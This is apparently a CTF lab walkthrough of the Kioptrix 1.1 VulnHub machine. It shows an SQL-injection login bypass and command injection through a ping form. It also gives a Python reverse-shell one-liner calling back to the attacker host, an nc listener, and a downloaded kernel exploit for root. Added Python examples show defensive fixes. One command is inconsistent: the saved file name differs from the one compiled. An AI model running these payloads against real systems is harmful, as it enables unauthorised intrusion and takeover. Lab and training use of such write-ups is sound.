Kioptrix 1.1 is a beginner-level CTF challenge. It is the second part of the Kioptrix series and can be downloaded from VulnHub. The objective of this challenge is to get root access on the machine by any possible means. There may be more ways than one to successfully complete the challenge.

Note: In order to keep all my CTF blog posts crisp and concise, I only mention the steps which led to positive results. There was a lot of trial and error, and hours or in some cases even days of failed attempts, before reaching the correct solution. So I strongly recommend trying the challenges on your own before moving on to see the solutions. Checking the walkthrough should be the last resort.

My lab setup consists of Kali Linux (referred to as the attacker) running in VMware Player with the network adapter set to NAT. The network setting of the downloaded VM (referred to as the victim) is changed (if not already) to NAT to bring it onto the same network as my attacking machine. I approach every challenge with the typical penetration testing methodology of Reconnaissance, Exploitation and Post Exploitation.

Reconnaissance

After booting up the VM, the first task is to find its IP address. My Kali box and the Kioptrix machine are on the same network (as the network setting is NAT). I start by checking my own IP address using ifconfig; the IP address of my Kali machine is 192.168.57.137. Knowing the network address, I scanned the whole network for live hosts using netdiscover:

netdiscover -r 192.168.57.0/24

The IP address of the Kioptrix machine is 192.168.57.138.

Now it is time for port scanning. I used nmap to perform a SYN scan (-sS) of all 65535 ports (-p-) with -A, which among other things detects the versions of the running services. The result is displayed in verbose mode (-v).

nmap -sS -p- -v -A 192.168.57.138

The scan result was a bit exhaustive, so I am only showing the interesting part. The box is running a web server, with port 80 listening for incoming connections.

Exploitation

On navigating to the URL http://192.168.57.138 we see a login form. Let's try SQL injection. I provided the input Administrator' or 1=1# in the username field.

We were able to bypass the login page !!!
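As an added example (not code from the Kioptrix box or from this write-up), the following Python shows why the input Administrator' or 1=1# gets past a login query built by string concatenation, and why the same login written with a parameterised query is unaffected. The sqlite3 table, user names and passwords are constructed for the demo; SQLite has no # line comment, so the vulnerable function emulates MySQL's handling of it before running the statement.

```python
"""Login check written two ways: the injectable version (string
concatenation) and the parameterised version. Added example; the users
table and credentials below are constructed and not from the target."""
import sqlite3


def make_db():
    # Constructed in-memory table standing in for the application's user store.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!'), ('john', 'hunter2')")
    return conn


def login_vulnerable(conn, username, password):
    # The user's quote closes the string literal, 'or 1=1' makes the WHERE
    # clause true for every row, and '#' comments out the password check.
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    # SQLite lacks MySQL's '#' line comment; emulate it so the demo shows
    # what the MySQL-backed form would execute.
    query = query.split("#", 1)[0]
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Parameter binding: the input is passed as data and is never parsed
    # as SQL, so quotes and comment markers have no effect on the query.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def demo():
    # Same payload against both implementations plus a genuine login.
    conn = make_db()
    payload = "Administrator' or 1=1#"
    return {
        "vulnerable": login_vulnerable(conn, payload, ""),
        "safe": login_safe(conn, payload, ""),
        "legit": login_safe(conn, "john", "hunter2"),
    }


if __name__ == "__main__":
    for name, who in demo().items():
        print("%-10s -> %s" % (name, "logged in as %s" % who if who else "rejected"))
```

The vulnerable function returns a user for a payload that contains no valid credentials at all, while the parameterised one returns None for it and still accepts the real john/hunter2 pair. A real application would also store password hashes rather than plaintext; the query shape is the point here.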

The page expects an IP address as input. When I provide the Kali machine's IP, a page pingit.php opens and displays the output of the 'ping' command. From the output it is very likely that the web application is vulnerable to arbitrary code execution. To verify this, let's append a Linux command, separated by ;, to the IP address. I used 'ls' to list everything in the current directory. And it worked !!!



We have found arbitrary code execution vulnerability. Our next goal is to get the reverse shell.
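As an added example (not the Kioptrix application's own code), here is a ping handler of the kind behind pingit.php written two ways: the injectable version splices the form field into a shell command line, and the hardened version only accepts a literal IP address and runs ping with an argument vector and no shell, so a ; or | in the field can never start a second command. The ping argument list and the metacharacter set used for alerting are assumptions for the demo.

```python
"""Ping handler two ways: injectable (string into shell) and hardened
(allow-list validation plus shell-free argument vector). Added example;
the argv layout and SHELL_METACHARS are assumptions for the demo."""
import ipaddress
import subprocess

# Characters that turn one shell command line into two or more (assumed
# list, used only for logging/alerting; the allow-list below does the blocking).
SHELL_METACHARS = set(";|&`$\n\r<>()")


def ping_command_unsafe(target):
    # What a shell_exec-style handler ends up running: the raw field is
    # concatenated into a command line that a shell parses, so a field of
    # '192.168.57.138; ls' runs ping and then ls.
    return "ping -c 3 " + target


def looks_like_injection(field):
    # Cheap detection for request logs: a ping target never needs any of these.
    return any(ch in SHELL_METACHARS for ch in field)


def validate_target(target):
    # Allow-list: the field must parse as a literal IPv4/IPv6 address.
    # ipaddress.ip_address raises ValueError for anything else, including
    # hostnames and addresses with shell syntax appended.
    return str(ipaddress.ip_address(target.strip()))


def is_valid_target(target):
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def ping_argv(target):
    # Argument vector for subprocess with shell=False: no shell ever sees the
    # string, so even a metacharacter that slipped past validation would be
    # handed to ping as a literal argument rather than interpreted.
    return ["ping", "-c", "3", validate_target(target)]


def run_ping(target):
    # Hardened handler: returns (exit code, combined output) or raises
    # ValueError on a bad target. stderr is merged so failures are visible,
    # unlike shell_exec, which returns NULL on error.
    proc = subprocess.run(ping_argv(target), stdout=subprocess.PIPE,
                          stderr=subprocess.STDOUT, text=True)
    return proc.returncode, proc.stdout


if __name__ == "__main__":
    for field in ["192.168.57.137", "192.168.57.138; cat pingit.php"]:
        print(repr(field), "valid:", is_valid_target(field),
              "suspicious:", looks_like_injection(field))
```

Validating against an IP address parser rather than filtering out individual characters is the safer choice: the allow-list does not depend on knowing every shell trick, and passing an argument vector with shell=False removes the shell from the picture entirely.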

Enumerate more

Let's check the source code of the pingit.php script. I provided the following input to the index.php page:

192.168.57.138; cat pingit.php

We can see that "shell_exec" is used to execute the command via the shell. The function's manual page says:

This function can return NULL both when an error occurs or the program produces no output. It is not possible to detect execution failures using this function. exec() should be used when access to the program exit code is required.

Since shell_exec does not display any error messages, we will redirect standard error (file descriptor 2) to standard output (file descriptor 1) for every command we execute via the index.php page. This will help us debug and identify the reason(s) if any of our commands fail to execute.

I prefer using the Python reverse shell script from pentestmonkey.

Check if python is installed on the victim

192.168.57.138; locate python 2>&1

Check for the installed python version

192.168.57.137| python -V 2>&1

The installed python version was found to be Python 2.3.4

Since the Python script from pentestmonkey is written for Python 2.7, it will not work here, because the 'subprocess' module is not available in Python 2.3.4.

I modified the reverse shell script for the installed version of Python:

python -c 'import socket,shlex,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.57.137",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);os.system("/bin/sh");'

Before executing the script, open the listener on Kali to receive the shell back

nc -nlvp 1234

Now provide the following input to get the reverse shell

192.168.57.137| python -c 'import socket,shlex,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.57.137",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);os.system("/bin/sh");' 2>&1







Post Exploitation

Let's do some information gathering on the victim.

whoami
id
uname -a

The shell we got runs as the 'apache' user, which has limited privileges. Our objective is to escalate privileges and become 'root'.

There is a kernel exploit available on Exploit-DB for Linux kernel 2.6.9 which will elevate privileges to root. Download the exploit to the 'tmp' directory on the victim.

wget -O /tmp/mod.c https://www.exploit-db.com/exploits/9542/

Compile the exploit and run it

gcc -o /tmp/9542 /tmp/9542.c
/tmp/9542

Bang !!!! Now we have root access on the victim 😀



I hope this write-up was helpful. Share it if you found it useful. If you have any questions, please leave your comments. Subscribe to the mailing list to get updates on my future CTF write-ups and blogs.

Happy Learning 🙂